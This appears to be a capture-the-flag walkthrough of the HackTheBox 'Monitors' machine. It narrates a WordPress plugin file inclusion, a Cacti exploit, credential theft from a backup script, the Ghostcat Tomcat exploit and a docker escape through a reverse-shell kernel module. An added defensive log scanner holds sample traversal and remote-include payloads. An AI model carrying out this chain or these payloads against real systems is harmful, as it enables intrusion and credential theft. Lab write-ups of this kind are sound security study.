Enumeration/Foothold
Monitors is a Hard box from HTB created by TheCyberGeek. This box features a WordPress plugin exploit via wp-with-spritz allowing for LFI/RFI, and an internal docker with Apache Tomcat running. I begin each box by running a RustScan. This is bundled into my setup.sh script which I've mentioned in a few of my other posts. Running RustScan with NMAP filters shows a website available on Port 80. The website states 'Sorry, direct IP access is not allowed' but provides an admin contact detail.

Admin contact email address shown on the landing page.
I edit my hosts file and add in monitors.htb.
Navigating over to the domain I see a WordPress website. Reviewing the page, I can see the copyright says 2018 and the last post is from 2020. I begin a WPScan with full flags.

Running out of date WordPress.
While the scan is running I notice that wp-with-spritz has been detected and that its last update was in 2015.

wp-with-spritz reported with 2015 as its last update.
A short search later shows me an entry from ExploitDB – 44544 which describes an LFI/RFI in the plugin. I tried a few RFIs to gain code execution or a shell but was unsuccessful.
Next I used the LFI (Local File Inclusion) exploit to pull the WP-Config file. The WP-Config file stores the database credentials for a WordPress installation. I viewed it in source as it tends to look cleaner than the static view.

wp-config.cfg file viewed in source.
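From the defender's side, the LFI and RFI attempts described above leave a clear trail in the web server's access log: plugin requests whose parameter values carry traversal sequences, sensitive file names, or remote URLs. The following is an added example, not code from the original post or from the plugin; it parses Apache combined-format log lines and flags those patterns. The sample log lines are constructed; the wp.spritz.content.filter.php?url= endpoint in them is the one published in the ExploitDB entry the post references, and I assume that is what the post's LFI/RFI traffic looked like.

```python
"""Flag LFI/RFI-style requests against WordPress plugin endpoints in Apache access logs."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache "combined" log format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# ".." as a whole path component, with either slash style
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')
SENSITIVE_FILES = ("wp-config.php", "/etc/passwd", "/etc/shadow", "000-default.conf")
# Schemes PHP's include() will fetch or interpret as a stream wrapper
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp|php|data|expect)://', re.IGNORECASE)


def decode_param(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e%252f) is seen as ../."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return findings for one request target (path + query); an empty list means nothing suspicious."""
    parts = urlsplit(target)
    findings = []
    if "/wp-content/plugins/" not in parts.path:
        return findings  # only plugin endpoints are in scope for this check
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = decode_param(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(("LFI-traversal", name, value))
        elif any(s in value for s in SENSITIVE_FILES):
            findings.append(("LFI-sensitive-file", name, value))
        if REMOTE_SCHEME_RE.match(value):
            findings.append(("RFI-remote-include", name, value))
    return findings


def scan_log(lines):
    """Run the classifier over log lines; return (client_ip, target, findings) for suspicious requests."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            alerts.append((m.group("ip"), m.group("target"), findings))
    return alerts


# Constructed sample log lines (not captured from the box). Lines 1-3 mimic traversal,
# encoded traversal to wp-config.php, and a remote include; lines 4-5 are benign traffic.
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2021:10:00:00 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd HTTP/1.1" 200 1320 "-" "curl/7.68.0"',
    '10.10.14.5 - - [01/Jan/2021:10:00:05 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 2100 "-" "curl/7.68.0"',
    '10.10.14.5 - - [01/Jan/2021:10:00:09 +0000] "GET /wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http://10.10.14.5/include.txt HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '192.168.1.20 - - [01/Jan/2021:10:01:00 +0000] "GET /wp-content/plugins/wp-with-spritz/style.css?ver=1.0 HTTP/1.1" 200 550 "http://monitors.htb/" "Mozilla/5.0"',
    '192.168.1.21 - - [01/Jan/2021:10:01:30 +0000] "GET /?p=12 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        for kind, param, value in findings:
            print(f"{ip} {kind} param={param} value={value}")
```

The check is deliberately scoped to plugin paths because that is where unmaintained code tends to live; widening it to the whole site is a one-line change, at the cost of more noise from legitimate `ver=` and redirect parameters. A 200 status on a traversal request is the strongest signal, since the include succeeded.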
I try the credentials to log in to the WordPress admin but they don't work. I check around a few locations for the next point of escalation. I review the NMAP output and realise the machine is running Apache/2.4.29. I navigate to the 000-default.conf to see if the page we saw earlier can give us any additional information or if any other hosts exist.

Running Apache/2.4.29

An additional VHOST is available.
I add the new host to my hosts file and navigate over to the new sub-domain. I try the credentials found earlier in the WP-Config file and log in. It took me a second as I needed to use admin for the username and not wpadmin.
I navigate around the console looking for a file upload or script option. Next I check the version, which is located at the top right of the page.

Cacti 1.2.12
Escalation
This leads me to ExploitDB – 49810 which I pull to my Attack VM and run. I fill in the required variables and submit the request, giving me a low-privilege shell.
Attack Machine (Tab 1)

ExploitDB – 49810 running successfully.
Attack Machine (Tab 2)
After getting onto the machine and upgrading my shell, I tried to use curl or wget to pull files to the box and was unable to do so as neither was installed. Using nc I pulled LinEnum to the box.
Victim Machine
Attack Machine
Going through the endless string of results I notice cacti-backup.service. I also notice that the user marcus, who I was trying to escalate to, had a .backup directory.

.backup directory in Marcus' home directory, and cacti-backup.service running on the machine.
Reviewing cacti-backup.service I can see that the .backup folder mentioned earlier has a shell script inside it. Viewing the script gives me his credentials. I su to his account, grab the flag and try ssh.

cacti-backup.service showing a backup script running in .backup, and the password for Marcus in backup.sh.
I log in with SSH and read the note –
This must be a clue to how I progress. I check the running services, looking for a docker installation. I notice Port 8443 open, which wasn't visible on the original scan. I use SSH to forward the port to my local host.

Port 8443 open on the local host.

Apache Tomcat/9.0.31 running on the local host.
Viewing the page does not give me the exploit I was hoping for, but I do notice Apache Tomcat/9.0.31 running, which I know is constantly being exploited. A short Google later shows me that a Metasploit module is available.

Apache Tomcat ‘Ghostcat’ Exploit via Metasploit
The first time I ran the exploit it errored and told me to use ForceExploit to override. Doing this allowed me to get a meterpreter shell.

ForceExploit option used due to the local host pivot.
After running the exploit I could see I was root of the docker environment. I knew the next steps were to escape and escalate. I found this article on hacktricks, hacktricks – Docker Breakout.
Inside the previous output you can see that the SYS_MODULE capability is enabled. Going through the first link led me to a second article focused fully on CAP_SYS_MODULE, hacktricks – CAP_SYS_MODULE. Truthfully this part can be confusing, so just follow the article as best you can.
Victim Machine
Attack Machine
Use the copy command (on the website) to copy reverse-shell.c and the Makefile. Then edit reverse-shell.c on Line 8 and put in your own IP/Port. Make sure when copying the Makefile that the indentation before each command is a real tab character. When done, launch a web server and pull both files to the machine.
Makefile
reverse-shell.c
After we run reverse-shell.ko on the docker VM our reverse shell pops and we are root.

Root on Monitors from HTB.